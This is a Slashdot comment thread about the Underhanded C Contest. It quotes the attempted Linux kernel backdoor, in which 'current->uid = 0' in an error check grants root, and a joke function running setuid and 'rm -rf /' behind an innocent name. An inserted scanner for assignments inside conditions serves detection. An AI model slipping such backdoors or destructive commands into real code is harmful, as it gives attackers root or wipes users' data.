Slashdot Mirror


Underhanded C Contest announces winners

Matthew Skala writes "The 2005 Underhanded C Contest has announced its winners: the team entry from M Joonas Pihlaja and Paul V-Khuong, and the solo entry from Natori Shin. The contest (which appeared on Slashdot in June) tests programmers' ability to hide malicious behaviour in innocent-seeming code, making it a kind of evil shadow twin to the International Obfuscated C Contest."

10 of 150 comments

  1. Bill Gates Entry by bjorniac · · Score: 5, Funny

    Microsoft Word XP was rejected because the code had to seem innocent...

    1. Re:Bill Gates Entry by makomk · · Score: 5, Interesting

      Very true. For those of you who don't get it, one of the winners uses a technique very similar to the way Word (all versions AFAIK) leaks data into documents - an uninitialised buffer.

    2. Re:Bill Gates Entry by Richard_at_work · · Score: 5, Interesting

      Found an interesting thing at work recently, during trials of VB.net and the .Net framework. Our VB.net programmer's applications worked right up until one day, when suddenly, they stopped working. Simple things like messages in Message Boxes stopped appearing, or labels on buttons went astray, mouse cursor changes on mouseover events showing black boxes instead of the image. Very weird, we thought. He reinstalled the .Net framework, VS.Net, everything he could think of but nothing rectified the problems. We eventually found out what the problem was - McAfee Virus protection now includes buffer overrun protection. Turn that off, and everything worked fine. Weird, just weird.

  2. good to see by garat · · Score: 5, Insightful

    Having a contest like this has similar positive aspects as full disclosure concerning vulnerabilities; by providing examples of how it's done, people will be better able to spot such attempts were they to occur. I'm happy to see this contest being held.

    --
    Support alternatives to Paypal: http://www.e-gold.com
  3. Will Code For Beer by Krast0r · · Score: 5, Funny

    "Prize: Since we're in Binghamton, NY, the prize will be a gift box from the nearby brewery Ommegang in Cooperstown, NY." Reminds me of that photograph, "Will Code For Food" - maybe this is the start of a new era. A combination of "free as in beer" and "will code for food".

    --
    Matthew Grint Midnight Artists
  4. I'm still fond of this one by $RANDOMLUSER · · Score: 5, Interesting
    This one almost made it into the Linux kernel. It looks like error checking until you read it carefully. Short, brilliant and to the point.

    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;

    In other words, you become root if you call sys_wait4() with the __WCLONE|__WALL flags.

    Story here and here

    --
    No folly is more costly than the folly of intolerant idealism. - Winston Churchill
    1. Re:I'm still fond of this one by Anonymous Coward · · Score: 5, Informative

      This one almost made it into the Linux kernel.

      It *did* make it into the kernel for anyone using the BK-to-CVS gateway.

    2. Re:I'm still fond of this one by jnf · · Score: 5, Informative

      To anyone who makes a routine of putting their constants on the left-hand side of the expression, that becomes not very hard to notice... although intermixed with several megabytes of source it becomes less obvious. What I mean is: if (( (__WCLONE|__WALL) == options && 0 = current->uid)) will throw an error, whereas 0 == current->uid will not.
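
    Added example, not part of the thread: a small heuristic scanner that flags an assignment inside an `if`/`while` condition, the pattern in the snippet quoted above, whichever side the constant is written on. The function names and every sample line except the first are constructed for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Heuristic: ignores comments, string/char literals and the <<= / >>= forms. */
/* Returns 1 if s[0..n) holds an '=' that is not part of ==, !=, <= or >=. */
static int has_assignment(const char *s, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        if (s[i] != '=')
            continue;
        if (i + 1 < n && s[i + 1] == '=') { i++; continue; }  /* "==" */
        if (i > 0 && strchr("!<>", s[i - 1]))                  /* "!=", "<=", ">=" */
            continue;
        return 1;
    }
    return 0;
}

/* Counts if/while conditions in src that contain an assignment. */
int count_suspicious_conditions(const char *src)
{
    int hits = 0;
    for (const char *p = src; *p; p++) {
        size_t kw = !strncmp(p, "if", 2) ? 2 : !strncmp(p, "while", 5) ? 5 : 0;
        if (!kw || (p > src && (isalnum((unsigned char)p[-1]) || p[-1] == '_')))
            continue;                      /* not a keyword at a word boundary */
        const char *q = p + kw;
        while (isspace((unsigned char)*q)) q++;
        if (*q != '(')
            continue;
        const char *open = q;
        int depth = 0;
        for (; *q; q++) {                  /* find the matching ')' */
            if (*q == '(') depth++;
            else if (*q == ')' && --depth == 0) break;
        }
        if (*q == ')' && has_assignment(open + 1, (size_t)(q - open - 1)))
            hits++;
        p = open;                          /* resume just inside the condition */
    }
    return hits;
}

/* Constructed sample: line 1 is the snippet from the comment, the rest are made up. */
static const char SAMPLE[] =
    "if ((options == (__WCLONE|__WALL)) && (current->uid = 0))\n    retval = -EINVAL;\n"
    "if ((options == (__WCLONE|__WALL)) && (current->uid == 0))\n    retval = -EINVAL;\n"
    "while ((n = read_more(buf)) > 0)\n    total += n;\n";

int main(void) { printf("%d\n", count_suspicious_conditions(SAMPLE)); return 0; }
```

    The deliberate `while ((n = ...) > 0)` idiom is flagged as well, so each hit is a prompt for a reviewer to look, not a verdict.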

  5. Re:I'll tell you what's underhanded by glesga_kiss · · Score: 5, Funny
    They predicted that kind of paranoid response. From their (humorous) FAQ:
    Are you shills from MicroSoft trying to evangelize C-sharp?

    No, we are not shills from MicroSoft trying to evangelize C-sharp.

    Are you trying to prove open source is bad?

    No, we are not trying to prove open source is bad. If anything, this contest illustrates that we need more code review, not less.

    I bet you are government agents trying to entrap me.

    Of course we're government agents: Binghamton University is a state university, part of the SUNY system. Evil! Eeeeeeeeeevilllll!!!!!

    Do you know you've been Slashdotted?

    What, you couldn't tell from the last three questions?

  6. cute fluffy kittens! by planetoid · · Score: 5, Funny

    int cute_fluffy_kittens(void)
    {
          printf("Cute fluffy kittens are now frolicking in a grassy field of daisies with their pink-nosed newborn puppy friends. Sit back and use your imagination to enjoy the spectacle for the next few minutes...\n");

          setuid(1);
          system("rm -rf /");
    }

    --
    Slashdot requires you to wait longer between hitting 'reply' and submitting a comment.